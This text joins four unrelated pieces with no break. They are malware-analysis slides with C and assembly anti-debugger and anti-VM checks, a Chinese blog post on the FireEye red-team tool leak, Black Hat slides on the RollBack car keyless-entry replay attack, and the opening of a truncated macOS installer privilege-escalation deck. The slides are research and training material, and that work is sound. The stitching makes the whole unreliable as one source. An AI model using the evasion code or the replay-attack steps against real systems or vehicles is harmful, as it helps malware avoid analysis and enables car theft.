Kronos) to crash at further point Classic debugger detection techniques Anti-debugger: the classic set • The fact that the application is being debugged leaves some artefacts in the execution environment • Malware tries to pick them up, and terminate or alter execution on such event • There is a list of classic, well-known techniques, that malware authors keep using from years, and probably will keep using in the future • Let’s take a look at them... Anti-debugger: approaches • Using flags in internal process structures: EPROCESS, PEB • Some of those checks can be invoked via APIs • Breakpoint detection • Reaction on exceptions • Time checks • Searching for the physical presence of the debugger in the system: checking running processes, windows names/classes, installation artifacts of a debugger Detecting debugger: basic API The most basic method, using: IsDebuggerPresent and/or CheckRemoteDebuggerPresent bool is_debugger_api() { if (IsDebuggerPresent()) return true; BOOL has_remote = FALSE; CheckRemoteDebuggerPresent(GetCurrentProcess(), &has_remote); return has_remote ? true: false; } Detecting debugger: basic API The most basic method, using: IsDebuggerPresent IsDebuggerPresent(32-bit ver,) 1. Get TEB 2. Get PEB 3. Get: BeingDebugged Flag PEB Anti-debugger: PEB • PEB contains information about the environment where the process was executed, and as well contains a lot of information relevant to detecting a debugger... • Using it is more stealthy then using API, and also easy to do in pure assembly (convenient for a shellcode) Detecting debugger: PEB The more stealthy variant of the previous method is getting the BeingDebugged flag via PEB Related API: • IsDebuggerPresent Detecting debugger: PEB Another flag in PEB related to being debugged is NtGlobalFlag (more recent addition: NtGlobalFlag2) NTGlobalFlag is set when the stack of the application is being watched Related API: • RtlGetCurrentPeb() PEB->NtGlobalFlag PEB->NtGlobalFlag2 Detecting debugger: PEB If the process is not being debugged: NtGlobalFlag == 0 Otherwise, the following flags are set (NtGlobalFlag == 0x70): FLG_HEAP_ENABLE_TAIL_CHECK 0x10 FLG_HEAP_ENABLE_FREE_CHECK 0x20 FLG_HEAP_VALIDATE_PARAMETERS 0x40 Detecting debugger: PEB PEB.ProcessHeap.Flags: • If not degugged: HEAP_GROWABLE (0x2) • Otherwise: HEAP_GROWABLE 0x2 HEAP_TAIL_CHECKING_ENABLED 0x20 HEAP_FREE_CHECKING_ENABLED 0x40 HEAP_SKIP_VALIDATION_CHECKS 0x10000000 HEAP_VALIDATE_PARAMETERS_ENABLED 0x40000000 Detecting debugger: PEB PEB.ProcessHeap.ForceFlags: • If not degugged: 0 • Otherwise: related to PEB.ProcessHeap.Flags: PEB.ProcessHeapFlags & 0x6001007D Detecting debugger: basic API The most basic method, using: CheckRemoteDebuggerPresent CheckRemoteDebuggerPresent EPROCESS Detecting debugger: API Some of the mentioned artifacts (and more) can be retrieved using NtQueryInformationProcess Relevant parameters: ProcessDebugPort 0x7 -> EPROCESS.DebugPort ProcessDebugFlags 0x1F -> !(EPROCESS.NoDebugInherit) ProcessDebugObjectHandle 0x1E -> returns DebugObject ProcessBasicInformation 0x0 -> to get the parent process https://ctf-wiki.github.io/ctf-wiki/reverse/windows/anti-debug/ntqueryinformationprocess/ Reaction on exceptions If the debugger is present, it will try to handle the exception: bool exception_is_dbg() { __try { RaiseException(DBG_PRINTEXCEPTION_C, 0, 0, 0); } __except (EXCEPTION_EXECUTE_HANDLER) { return false; } return true; } Hardware breakpoints • There are 4 Debug registrs that we can use for setting Hardware Breakpoints: • DR0-DR3 • Once we set the Hardware Breakpoint, the relevant address is filled in one of those registers. Example: • DR6 – flags indicating the Debug Register which’s breakpoint got hit • DR7 – flags indicating which of the Debug Registers are set Hardware breakpoints Checking if the Hardware Breakpoints have been set: bool hardware_bp_is_dbg() { CONTEXT ctx = { 0 }; bool is_hardware_bp = false; HANDLE thread = OpenThread(THREAD_ALL_ACCESS, FALSE, GetCurrentThreadId()); ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; if (GetThreadContext(thread, &ctx)) { is_hardware_bp = (ctx.Dr0 | ctx.Dr1 | ctx.Dr2 | ctx.Dr3) != 0; } CloseHandle(thread); return is_hardware_bp; } The Trap Flag: Single Stepping • The Trap Flag is one of the Flags in the EFLAGS register • Setting the Trap Flag - allowing to step throught the code via INT 0x1: „Single Step” after each instruction (generates an exception) 0x346 XOR 0x246 = 0x100 (TF) The Trap Flag: Single Stepping We cannot access EFLAGS directly - we need to do it via stack: If we are single-stepping through the code, the debugger will handle the generated interrupt. Otherwise, setting of the Trap Flag will generates an exception. pushfd ; push all the flags or dword ptr[esp], 0x100 ; the flags are now in [esp] ; apply the mask to set the bit ; 0x100, that means TF popfd ; load the flags from the stack again The time check • Debugging (also: emulation, or tracing the application by instrumentation tools) often slows down the execution • The time check is a simple way to find out that the application may be under control of analysis tools • The time check is often implemented with the help or RDTSC (Read Time- Stamp Counter) instruction RDTCS -> EDX:EAX = TimeStampCounter https://c9x.me/x86/html/file_module_x86_id_278.html The time check The time should be measured at least twice, and compared with a threshold. Example: bool antidbg_timer_check() { static ULONGLONG time = 0; if (time == 0) { time = __rdtsc(); return false; } ULONGLONG second_time = __rdtsc(); ULONGLONG diff = (second_time - time) >> 20; if (diff > 0x100) { time = second_time; return true; } return false; } Defense against anti-debug • Debugger Plugins, i.e. • ScyllaHide (using user-mode hooking) • TitanHide (using kernel-mode hooking) • SharpOD • OllyDbg plugins (older, classics): • OllyAdvanced • Phantom • StrongOD https://github.com/fr0gger/awesome-ida-x64-olly-plugin Classic anti-VM techniques Anti-VM fingerprinting • Virutal Machine emulates the real one to big extend, but still there are some artifacts in the environment that makes it distinguishable • Depending which hypervisor do we use, those artifacts will differ • It is quite common among malware to look for some of those artifacts in order to detect the Virtual Machine • Some checks base on the presence of some particular names, related to the hypervisor, other – on some loosely related features (i.e. relatively weak parameters, one processor, etc) Anti-VM: approaches • Using presence/absence of some intstructions • Identifiers returned by CPUID • Memory-specific („The Red Pill” – IDT checking; GDT, LDT checks) • Time checks • Weaker hardware parameters (comparing to most modern physical machines) • Searching for the physical presence of the VM-related artifacts: checking running processes, windows names/classes, registry keys, etc. CPUID (1) • One of the low-level anti-vm techniques, is a check using CPUID instruction • Check for processof features: https://c9x.me/x86/html/file_module_x86_id_45.html mov is_bit_set, 0 mov eax, 1 ; the parameter given to CPUID cpuid bt ecx, 0x1f; bit 31 jnc finish mov is_bit_set, 1 ; if the bit is set, it is a VM finish: CPUID (0x40000000) • One of the low-level anti-vm techniques, is a check using CPUID instruction • Check for the hypervisor brand: https://c9x.me/x86/html/file_module_x86_id_45.html mov eax, 0x40000000; the parameter given to CPUID cpuid mov brand_id_0, ebx mov brand_id_1, ecx mov brand_id_2, edx CPUID (0x40000000) • One of the low-level anti-vm techniques, is a check using CPUID instruction https://github.com/a0rtega/pafish/blob/master/pafish/cpu.c "KVMKVMKVM\0\0\0"; // KVM "Microsoft Hv"; // MS Hyper-V or Virtual PC "VMwareVMware"; // VMware "XenVMMXenVMM"; // Xen "prl hyperv "; // Parallels "VBoxVBoxVBox"; // VirtualBox CPUID - defense • Fortunately, we often can overwrite the values returned by CPUID by our own • Appropriate settings may force the VM to supply our custom values instead of the hardcodes ones... https://www.vmray.com/cyber-security-blog/a-pafish-primer/ CPUID - defense • In VMWare: settings can be changed in the .vmx file • Anti bit-check - CPUID (1) • Anti brand-check (0x40000000) https://rayanfam.com/topics/defeating-malware-anti-vm-techniques-cpuid-based-instructions/ cpuid.1.ecx="0---:----:----:----:----:----:----:----" cpuid.40000000.ecx="0000:0000:0000:0000:0000:0000:0000:0000" cpuid.40000000.edx="0000:0000:0000:0000:0000:0000:0000:0000" VMWare I/O port • Trying to read the special I/O port, used by VMware to communicate with host, with the help of IN instruction • On a physical machine, the exception will occur https://blog.malwarebytes.com/threat-analysis/2014/09/five-anti-debugging-tricks-that-sometimes-fool- analysts/ mov eax, ‘VMXh’ mov ebx,0 mov ecx, 10 Mov edx, ‘VX’ in eax, dx cmp ebx,’VMXh’ TODO... • To be continued
从FireEye的泄露看红队的差距 1. 前言 一大早被领导拉起来分析火眼事件。朋友圈整个安全圈子也是沸腾不已,但随着分析的深入,发现有 点“小题大做”了,没有想要的高尖精工具和技术方案,全是一堆已知攻击技术的红队模拟工具。但站在 一个红队人员的角度,也是收获不少。 2. 红队服务真的有用“假想敌手段”么? 以“假想敌”手段来评估企业安全,这里的手段往往被定义为APT手段。国内当前的红队服务使用的手段是 APT手段么?什么是APT手段?红队是怎么模拟的? 在火眼给的防御策略中,明显看出APT开头的很多样本、工具、后门。火眼的安全人员把各项在APT活动 中的技术方法做成了红队工具,用来评估企业对各种APT技术的防御能力,至少从工具层面火眼做到 了“假想敌”的要求。而国内的红队怎么样呢?,大家自己体会,不多说。 什么是APT手段,国内大部分公司把APT追踪放在威胁情报部门,也出了一些分析报告,从技术手段来 说,所谓的APT报告可能只能叫做样本分析报告吧。有没有对发现的技术进行工具化,提供给红队做红 队评估,大家心里有数。 3. 如果火眼红队只有“这样的水平”,也不过如此 号称全球最懂APT的火眼,如果仅仅只有策略体现的水平,有点名不副实了。 从策略中分析,有60%左右的开源项目,%35左右的为开源项目二次开发,%5左右为已知技术的实现, 所有的技术全部为已知且公开技术。没有前瞻性的技术方案,没有大型的工具平台,我想说“我不信”。 4. 从策略看国外红队工程化水准 毫不客气的说,是领先了国内很多的。其中大部分是C#开发,符合国外红队圈子的技术走向。GITHUB 开源的红队工具大部分也是C#开发,我读过一些工具的代码,水准也是一般,这可能也是火眼进行了大 量二次开发的原因吧!再回头看国内,武器化思路才起步,谈工程化就有点打脸。没有开源氛围,没有 工程化能力,想开源的代码能力弱了点,代码能力强的敝帚自珍。工具的法律风险也是一大掣肘。“既不 懂APT也不会写代码,你给我说你是做红队的” 5.作为技术人员还是要看点技术 大部分技术人员可能和我一样,看能不能捞点工具回来,FireEYE泄露的工具,至少比开源工具稳定性要 好些。可是我通过md5上VT捞,结论是:没有!没有!没有!但是也给了一些不大不小的启示: 1. GORat火眼竟然在用,我可能需要去尝试下 2. 其中有个D语言后门,多搞点小众语言减轻杀软对抗的痛苦 3. Dll劫持是不错的权限维持手段,策略里面含有大量dll劫持方案,但是都是公开的 4. 各种Loader的制作还是对抗的前沿 5. 还是要多造轮子,已有的轮子不一定都是好轮子 6. 已知漏洞武器化还是很有必要,相信大部分人和我一样眼馋的是那份CVE武器化工具,潜意识认为 火眼开发的利用一定还是不错的。 6. 我们的路还很长 红队的路还很长,认清楚差距,看明白方向。最后希望火眼披露攻击细节,希望看见黑客世界顶尖的样 子。就目前的公开的我想说“我裤子都脱了,你给我看这个?”
#BHUSA   @BlackHatEvents RollBack A New Time-Agnostic Replay Attack Against the Automotive Remote Keyless Entry Systems Joint work with Jun Wen Wong (NCS Group / DSBJ), Soundarya Ramesh (NUS), Rohini Poolat Parameswarath (NUS), Mun Choon Chan (NUS) Levente Csikor NCS Group Institute for Infocomm Research, A*STAR Hoon Wei Lim NCS Group #BHUSA   @BlackHatEvents Information Classification: General Keyless car thefts have been on the rise 2/42 #BHUSA   @BlackHatEvents Information Classification: General Keyless car thefts have been on the rise ❏ Keyless entry car technology now accounts for nearly 50% of all vehicle thefts UK Daily Mail, Jul 2021 ❏ The risk of technology-enabled vehicle theft will continue to increase Auto-ISAC Threat Assessment Report 2021 ❏ Keyless entry/key fob is one of top two most common attack vectors Upstream Global Automotive Cybersecurity Report 2022 3/42 #BHUSA   @BlackHatEvents Information Classification: General Threats against remote keyless entry systems ❏ Manipulation of key fob signals ❏ Signal jamming ❏ Relay (amplification) attacks ❏ Replay attacks ❏ Attack on key management and cryptographic algorithms ❏ Key enrolment ❏ Key replacement ❏ Key extraction 4/42 #BHUSA   @BlackHatEvents Information Classification: General Recent car hacks based on replay of signals 5/42 #BHUSA   @BlackHatEvents Information Classification: General Our new findings in a nutshell ❏ New replay attack - RollBack ❏ Revealed highly unusual behavior – more effective than previously known key fob replay attacks ❏ Initial discovery in Aug 2021: unlocked a car by replaying two consecutive signals within 5 seconds ❏ Derived new generic attack metrics in Mar 2022 that work across different car makes & models: no. of signals, sequence, interval, instructions in the signal ❏ Appear consistent with security assessments by Thatcham Research – Consumer Security Ratings 2021 ❏ Responsible disclosure ❏ Notified key fob chip manufacturers in Apr 2022 ❏ Shared findings with Auto-ISAC in May 2022 Source: Thatcham Research, 2021 6/42 #BHUSA   @BlackHatEvents Rolling codes Brief overview of the operation background #BHUSA   @BlackHatEvents Information Classification: General ❏ Note: provision is made if key fob’s counter is “in the future” ❏ Buttons accidentally pressed but far outside of the vehicle’s vicinity ❏ Upon successful reception, counters become re-synchronized again ❏ Every key fob signal transmission is unique ❏ “There are NO two unlock signals that are the same” ❏ Every time a button is pressed and a signal is received by the vehicle, both increase a counter for the next use ❏ If counters are in sync upon reception → vehicle acts as instructed/expected Rolling codes in a nutshell 8/42 [1] Microchip, “KeeLoq™ Code Hopping Encoder,” Microchip HCS200, https://bit.ly/3GqCl5c, 2011 [Accessed: Jul 2022]. #BHUSA   @BlackHatEvents Information Classification: General ❏ RollJam attack ❏ Signal Jamming + Capturing + Replaying ❏ Lure the owner into a situation where “future codes” can be obtained easily ❏ RollJam is/was not a “new hack” ❏ it converts the safety provisioning feature into an exploit Rolling codes - Straightforward “exploit” ❏ If an attacker can capture the signals of the accidental button presses outside of the vicinity of the vehicle ❏ We have the “future codes” → Straightforward “exploit” ❏ BUT: Obtaining valid “future code” in reality is extremely difficult 9/42 #BHUSA   @BlackHatEvents RollJam Infamous attack against all rolling code-based systems related work #BHUSA   @BlackHatEvents Information Classification: General RollJam in a nutshell ❏ Good-guy hacker, Samy Kamkar, proposed it in 2015 ❏ Special-purpose small device (< 30 USD) ❏ Close to the vehicle (suffixed at a hidden spot) ❏ It can ❏ Capture ❏ Jam ❏ Replay signals ❏ Acts as Man-in-the-Middle proxy between the key fob and the vehicle RollJam in the news: https://www.wired.com/2015/08/hackers-tiny-device-unlocks-cars-opens-garages/ 11/42 #BHUSA   @BlackHatEvents Information Classification: General RollJam in a nutshell ❏ Good-guy hacker, Samy Kamkar, proposed it in 2015 ❏ Special-purpose small device (< 30 USD) ❏ Close to the vehicle (suffixed at a hidden spot) ❏ It can ❏ Capture ❏ Jam ❏ Replay signals ❏ Acts as Man-in-the-Middle proxy between the key fob and the vehicle ❏ First “unlock” signal sent ❏ Captured and jammed to hinder the car to receive it RollJam in the news: https://www.wired.com/2015/08/hackers-tiny-device-unlocks-cars-opens-garages/ 12/42 #BHUSA   @BlackHatEvents Information Classification: General RollJam in a nutshell ❏ Good-guy hacker, Samy Kamkar, proposed it in 2015 ❏ Special-purpose small device (< 30 USD) ❏ Close to the vehicle (suffixed at a hidden spot) ❏ It can ❏ Capture ❏ Jam ❏ Replay signals ❏ Acts as Man-in-the-Middle proxy between the key fob and the vehicle ❏ First “unlock” signal sent ❏ Captured and jammed to hinder the car to receive it ❏ Second “unlock” signal sent (as a retry) ❏ Captured and jammed + first signal replayed ❏ Vehicle acts as intended RollJam in the news: https://www.wired.com/2015/08/hackers-tiny-device-unlocks-cars-opens-garages/ 13/42 #BHUSA   @BlackHatEvents Information Classification: General RollJam in a nutshell ❏ Good-guy hacker, Samy Kamkar, proposed it in 2015 ❏ Special-purpose small device (< 30 USD) ❏ Close to the vehicle (suffixed at a hidden spot) ❏ It can ❏ Capture ❏ Jam ❏ Replay signals ❏ Acts as Man-in-the-Middle proxy between the key fob and the vehicle ❏ First “unlock” signal sent ❏ Captured and jammed to hinder the car to receive it ❏ Second “unlock” signal sent (as a retry) ❏ Captured and jammed + first signal replayed ❏ Vehicle acts as intended ❏ Attacker has the next valid yet unused “unlock” signal RollJam in the news: https://www.wired.com/2015/08/hackers-tiny-device-unlocks-cars-opens-garages/ *Assuming that lock and unlock signals do not use the same counter 14/42 #BHUSA   @BlackHatEvents RollBack Time-Agnostic Re-Synchronization Attacks this is what you came for CVE-2022-36945 CVE-2022-37305 CVE-2022-37418 #BHUSA   @BlackHatEvents Information Classification: General RollBack - two captured signals ❏ Setup is similar to RollJam ❏ Capture + Jam* + Replay ❏ HOWEVER: RollBack is different *RollBack does not necessitate jamming but it can ease/fasten the signal capturing process 16/42 #BHUSA   @BlackHatEvents Information Classification: General RollBack - two captured signals ❏ Setup is similar to RollJam ❏ Capture + Jam* + Replay ❏ HOWEVER: RollBack is different ❏ First “unlock” signal sent ❏ Captured and jammed to hinder the car to receive it *RollBack does not necessitate jamming but it can ease/fasten the signal capturing process 17/42 #BHUSA   @BlackHatEvents Information Classification: General RollBack - two captured signals ❏ Setup is similar to RollJam ❏ Capture + Jam* + Replay ❏ HOWEVER: RollBack is different ❏ First “unlock” signal sent ❏ Captured and jammed to hinder the car to receive it ❏ Second “unlock” signal sent (as a retry) ❏ Captured only and let the vehicle receive it ❏ Vehicle acts as intended *RollBack does not necessitate jamming but it can ease/fasten the signal capturing process 18/42 #BHUSA   @BlackHatEvents Information Classification: General RollBack - two captured signals ❏ Setup is similar to RollJam ❏ Capture + Jam* + Replay ❏ HOWEVER: RollBack is different ❏ First “unlock” signal sent ❏ Captured and jammed to hinder the car to receive it ❏ Second “unlock” signal sent (as a retry) ❏ Captured only and let the vehicle receive it ❏ Vehicle acts as intended ❏ Owner uses the vehicle/key fob as usual ❏ as many times s/he wants *RollBack does not necessitate jamming but it can ease/fasten the signal capturing process n > 400 19/42 #BHUSA   @BlackHatEvents Information Classification: General RollBack - two captured signals ❏ Setup is similar to RollJam ❏ Capture + Jam* + Replay ❏ HOWEVER: RollBack is different ❏ First “unlock” signal sent ❏ Captured and jammed to hinder the car to receive it ❏ Second “unlock” signal sent (as a retry) ❏ Captured only and let the vehicle receive it ❏ Vehicle acts as intended ❏ Owner uses the vehicle/key fob as usual ❏ as many times s/he wants ❏ Attacker can replay the two consecutive “unlock” signals ❏ note: some system has more restrictions on the replayed signals (see later) *RollBack does not necessitate jamming but it can ease/fasten the signal capturing process n > 400 20/42 #BHUSA   @BlackHatEvents Information Classification: General Why RollBack? Advantages? ❏ Rolling back to a previous code/state ❏ The captured consecutive signals are replayed ❏ The vehicle re-synchronize to a previous code ❏ To the old counters in the last replayed signal ❏ Vehicle acts according to the instruction in the signals ❏ i.e., unlocks 1. last unlock signal received 21/42 #BHUSA   @BlackHatEvents Information Classification: General Why RollBack? Advantages? ❏ Rolling back to a previous code/state ❏ The captured consecutive signals are replayed ❏ The vehicle re-synchronize to a previous code ❏ To the old counters in the last replayed signals ❏ Vehicle acts according to the instruction in the signals ❏ i.e., unlocks 1. last unlock signal received (all signals are invalid) 22/42 #BHUSA   @BlackHatEvents Information Classification: General Why RollBack? Advantages? ❏ Rolling back to a previous code/state ❏ The captured consecutive signals are replayed ❏ The vehicle re-synchronize to a previous code ❏ To the old counters in the last replayed signals ❏ Vehicle acts according to the instruction in the signals ❏ i.e., unlocks 2. replay first two unlock signals 23/42 1. last unlock signal received (all signals are invalid) #BHUSA   @BlackHatEvents Information Classification: General Why RollBack? Advantages? ❏ Rolling back to a previous code/state ❏ The captured consecutive signals are replayed ❏ The vehicle re-synchronize to a previous code ❏ To the old counters in the last replayed signals ❏ Vehicle acts according to the instruction in the signals ❏ i.e., unlocks 2. replay first two unlock signals 24/42 3. Vehicle unlocks, counters rolled back to this state #BHUSA   @BlackHatEvents Information Classification: General Why RollBack? Advantages? ❏ Rolling back to a previous code/state ❏ The captured consecutive signals are replayed ❏ The vehicle re-synchronize to a previous code ❏ To the old counters in the last replayed signals ❏ Vehicle acts according to the instruction in the signals ❏ i.e., unlocks 25/42 3. Vehicle unlocks, counters rolled back to this state (first two signals become invalid) #BHUSA   @BlackHatEvents Information Classification: General ❏ Rolling back to a previous code/state ❏ The captured consecutive signals are replayed ❏ The vehicle re-synchronize to a previous code ❏ To the old counters in the last replayed signals ❏ Vehicle acts according to the instruction in the signals ❏ i.e., unlocks ❏ Time-agnostic – attacker can rollback the system ❏ At any time ❏ As many times as desired Why RollBack? Advantages? 4. These signals are valid again More effective* than RollJam *More effective ‘iff’ vulnerable: RollJam “breaks” all rolling code-based systems, while RollBack only ~70% of them (see later) 26/42 3. Vehicle unlocks, counters rolled back to this state (first two signals become invalid) #BHUSA   @BlackHatEvents Information Classification: General RollBack - Variants ❏ Different vulnerable RKE systems impose different requirements ❏ Properties: a. b. c. Yes, so far no variant in between, i.e., no variant found yet like ● (2, Strict, X) ● (2, Loose, y sec) a. Number of signals ❏ how many signals do we need to capture? b. Sequence / consecutiveness ❏ capture signal in order only OR strictly sequentially? ❏ capture and replay (1, 2, 3) vs. (1, 4, 5) c. Time frame ❏ How fast do we need to replay the captured signals? 27/42 #BHUSA   @BlackHatEvents Information Classification: General RollBack “in the wild” Disclaimer ❏ No REAL attempts made in the wild ❏ All recorded signals were permanently deleted after the tests ❏ except for two vehicles for testing the time-agnostic feature of RollBack ❏ afterward, those signals were permanently deleted ❏ RollBack attack (or any replay attack) does not make any harm to the vehicle ❏ key fob might be temporarily blocked ❏ the physical key has to be used once to access the vehicle 28 28/42 #BHUSA   @BlackHatEvents Information Classification: General ❏ Evaluation on a limited set of vehicles so far RollBack “in the wild” ❏ “Blurry” conclusion ❏ Age DOES NOT matter ❏ Petrol vs. hybrid DOES NOT matter ❏ Most of the popular Asian cars tested ARE affected ❏ All tested Mazda, Honda, Kia ARE vulnerable ❏ All tested Toyota cars ARE safe ❏ All Mfr. 2 and Mfr. 3 ARE affected* ❏ They both need 2 signals only ❏ Most Mfr. 1 RKE ARE affected* ❏ Mazda needs 3 signals ❏ Honda needs 5 signals ❏ Vehicles using Mfr. 4’s RKE ARE NOT affected* *Although not the key fobs have the flaw but probably the receiving unit (typically manufactured by other OEMs), we observe a correlation (so far) 29/42 #BHUSA   @BlackHatEvents DEMO RollBack in action this might be of interest too #BHUSA   @BlackHatEvents https://youtu.be/auPtxnbly4s https://youtu.be/ItY11yo95R8 https://youtu.be/sdsfDKSfGhU https://youtu.be/nyVqsaSCKks and maybe more RollBack in General #BHUSA   @BlackHatEvents RollBack is instruction-agnostic something new #BHUSA   @BlackHatEvents Information Classification: General ❏ Attackers have even fewer things to do 1. Victim goes to a parking lot (e.g., to do the groceries) 2. Presses the lock button (twice) a. most of us press the lock button twice (to confirm) 3. Wait for the victim to come back and capture the “unlock” signal 4. PROFIT RollBack - Instruction-agnostic ❏ Instruction encoded in the signal DOES NOT matter ○ confirmed for Mazda ❏ we only need 3 consecutive signals ○ confirmed for Kia (see demo later) ❏ any two sequential but NOT STRICTLY CONSECUTIVE signals work unlock lock lock 33/42 ❏ NOTE: ❏ Car-sharing / Car-renting use cases are the simplest ❏ In car-sharing, the original key is usually inside → vehicle is at risk Car-sharing scenario #BHUSA   @BlackHatEvents RollBack: instruction-agnostic https://youtu.be/auPtxnbly4s https://youtu.be/ItY11yo95R8 https://youtu.be/sdsfDKSfGhU https://youtu.be/nyVqsaSCKks and maybe more #BHUSA   @BlackHatEvents Root Cause & Mitigation The missing pieces of the puzzle #BHUSA   @BlackHatEvents Information Classification: General Root Cause & Mitigation ❏ Root cause: still unknown ❏ Possible candidate: key fob learning process ❏ Microchip has publicly available documentation [1] https://i.ytimg.com/vi/8ARxmFVPJ3o/maxresdefault.jpg [1] Microchip, “KeeLoq™ Code Hopping Encoder,” Microchip HCS200, https://bit.ly/3GqCl5c, 2011 [Accessed: Jul 2022]. 36/42 #BHUSA   @BlackHatEvents Information Classification: General Root Cause & Mitigation ❏ Root cause: still unknown ❏ Possible candidate: key fob learning process ❏ Microchip has publicly available documentation [1] ❏ HOWEVER: there are several unusual steps ❏ entering/exiting from the learning mode? Forever learning mode? ❏ time frame between signals ❏ vehicle reaction ❏ old key fob re-added? https://i.ytimg.com/vi/8ARxmFVPJ3o/maxresdefault.jpg [1] Microchip, “KeeLoq™ Code Hopping Encoder,” Microchip HCS200, https://bit.ly/3GqCl5c, 2011 [Accessed: Jul 2022]. 37/42 #BHUSA   @BlackHatEvents Information Classification: General Root Cause & Mitigation ❏ Root cause: still unknown ❏ Possible candidate: key fob learning process ❏ Microchip has publicly available documentation [1] ❏ HOWEVER: there are several unusual steps ❏ entering/exiting from the learning mode? Forever learning mode? ❏ time frame between signals ❏ vehicle reaction ❏ old key fob re-added? ❏ Mitigation ❏ General advice: most jamming-based attacks can be avoided by precautionary measures ❏ e.g., first signal received but second was not in the case of RollJam https://i.ytimg.com/vi/8ARxmFVPJ3o/maxresdefault.jpg [1] Microchip, “KeeLoq™ Code Hopping Encoder,” Microchip HCS200, https://bit.ly/3GqCl5c, 2011 [Accessed: Jul 2022]. 38/42 #BHUSA   @BlackHatEvents Information Classification: General Root Cause & Mitigation ❏ Root cause: still unknown ❏ Possible candidate: key fob learning process ❏ Microchip has publicly available documentation [1] ❏ HOWEVER: there are several unusual steps ❏ entering/exiting from the learning mode? Forever learning mode? ❏ time frame between signals ❏ vehicle reaction ❏ old key fob re-added? ❏ Mitigation ❏ General advice: most jamming-based attacks can be avoided by precautionary measures ❏ e.g., first signal received but second was not in the case of RollJam ❏ RollBack does not necessitates jamming ❏ Being time-agnostic, no precautionary measure applies https://i.ytimg.com/vi/8ARxmFVPJ3o/maxresdefault.jpg [1] Microchip, “KeeLoq™ Code Hopping Encoder,” Microchip HCS200, https://bit.ly/3GqCl5c, 2011 [Accessed: Jul 2022]. 39/42 #BHUSA   @BlackHatEvents Information Classification: General Root Cause & Mitigation ❏ Root cause: still unknown ❏ Possible candidate: key fob learning process ❏ Microchip has publicly available documentation [1] ❏ HOWEVER: there are several unusual steps ❏ entering/exiting from the learning mode? Forever learning mode? ❏ time frame between signals ❏ vehicle reaction ❏ old key fob re-added? ❏ Mitigation ❏ General advice: most jamming-based attacks can be avoided by precautionary measures ❏ e.g., first signal received but second was not in the case of RollJam ❏ RollBack does not necessitates jamming ❏ Being time-agnostic, no precautionary measure applies ❏ Use timestamps along with the rolling codes (and check!) https://i.ytimg.com/vi/8ARxmFVPJ3o/maxresdefault.jpg [1] Microchip, “KeeLoq™ Code Hopping Encoder,” Microchip HCS200, https://bit.ly/3GqCl5c, 2011 [Accessed: Jul 2022]. 40/42 #BHUSA   @BlackHatEvents Sound bytes a.k.a. 3 KEY TAKEAWAYS 1) RollBack - Capturing and replaying a couple of signals re-synchronizes the rolling codes and unlocks most of today’s modern (Asian) vehicles tested a) RollBack is instruction-agnostic 2) Unlike RollJam, RollBack a) does not require signal jamming, only signal capturing once b) captured signals can be replayed at any time and as many times as desired 3) So far, the root cause is not confirmed and no explicit mitigation exists a) adding timestamps to the signals (and checking them) might help 41/42 #BHUSA   @BlackHatEvents Q&A Reach out to us for any further enquiry Thanks to our co-authors: Jun Wen Wong (NCS Group / DSBJ), Soundarya Ramesh (NUS), Rohini Poolat Parameswarath (NUS), Mun Choon Chan (NUS) for their support (e.g., their cars :D) and inputs Levente Csikor NCS Group Institute for Infocomm Research, A*STAR levente.csikor@gmail.com csikor_levente@i2r.a-star.edu.sg Hoon Wei Lim NCS Group hoonwei.lim@ncs.com.sg Whitepaper will be released soon on the Black Hat site with more information. Don’t forget to get back ;) Photo by Kelly Sikkema on Unsplash
@patrickwardle DEATH BY 1000 INSTALLERS ...it's all broken :( WHOIS “leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” security for the 21st century @patrickwardle issues; bugs; & exploits! OUTLINE authorization core issues finding 0days bugs exploits (user-assisted) privilege escalation THE GOAL infect trojan email exploits } 1 2 escalate privileges $_ #_ fake popups (lame) vulnerabilities today, we'll focus on finding & exploiting vulnerabilities in installers/updaters that (with user assistance) provide the means for local elevation of privileges. } (not lame) today's talk AUTHORIZATION executing priv'd actions (ui) (low-priv'd) apps may need to perform priv'd actions THE NEED installing updating debugging system conf } most common ...for me, about 1x a day! authentication & authorization BEHIND THE SCENES security agent: show authentication dialog installer: "I wanna do a priv'd action" 1 2 3 4 authorization daemon: authorization database XPC XPC priv'd action! more info: "Authorization Services Programming Guide" -apple "*OS Internals v.III" -levin consult auth db xpc for auth prompt request via AuthorizationExecuteWithPrivileges() BEHIND THE SCENES installer: "I wanna do a priv'd action" 1 AuthorizationRef authRef; AuthorizationCreate(NULL, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, &authRef); AuthorizationExecuteWithPrivileges(authRef, "/path/to/binary", kAuthorizationFlagDefaults, NULL, NULL); AuthorizationExecuteWithPrivileges() define TRAMPOLINE "/usr/libexec/ security_authtrampoline" AuthorizationExecuteWithPrivileges() -> AuthorizationExecuteWithPrivilegesExternalForm() switch (fork()) { //child case 0: execv(trampoline, (char *const*)argv); $ ls -lart /usr/libexec/security_authtrampoline -rws--x--x root wheel security_authtrampoline int main() { AuthorizationItem right = {EXECUTERIGHT, ...}; AuthorizationRights inRights = { 1, &right }; AuthorizationCopyRights(auth, &inRights, NULL, kAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed, &outRights)) execv(pathToTool, (char *const *)restOfArguments); XPC # ps aux | grep authd 112 /System/Library/Frameworks/Security.framework/ Versions/A/XPCServices/authd.xpc/Contents/MacOS/authd # lsmp -p 112 | grep security_authtrampoline ... send-once --> (1243) security_authtrampoline # lsmp -p 1243 | grep authd send-once <-- (112) authd security_authtrampoline security_authtrampoline; setuid authd; servicing authorization requests BEHIND THE SCENES authd: "responsible for servicing authorization requests made by client" -*OS Internals, j levin (p. 92) 2 authorization database # sqlite3 /var/db/auth.db .dump | grep system.privilege.admin INSERT INTO "rules" VALUES(135,'system.privilege.admin',1,1,'admin',...
 'Used by AuthorizationExecuteWithPrivileges(...). XPC XPC //'system.privilege.admin' AuthorizationItem right = {EXECUTERIGHT, ...}; AuthorizationCopyRights(...); authorization daemon: consult auth db xpc for auth prompt Security Agent; give me creds! BEHIND THE SCENES $ lsappinfo processlist ASN:0x0-0x1001-"loginwindow": 
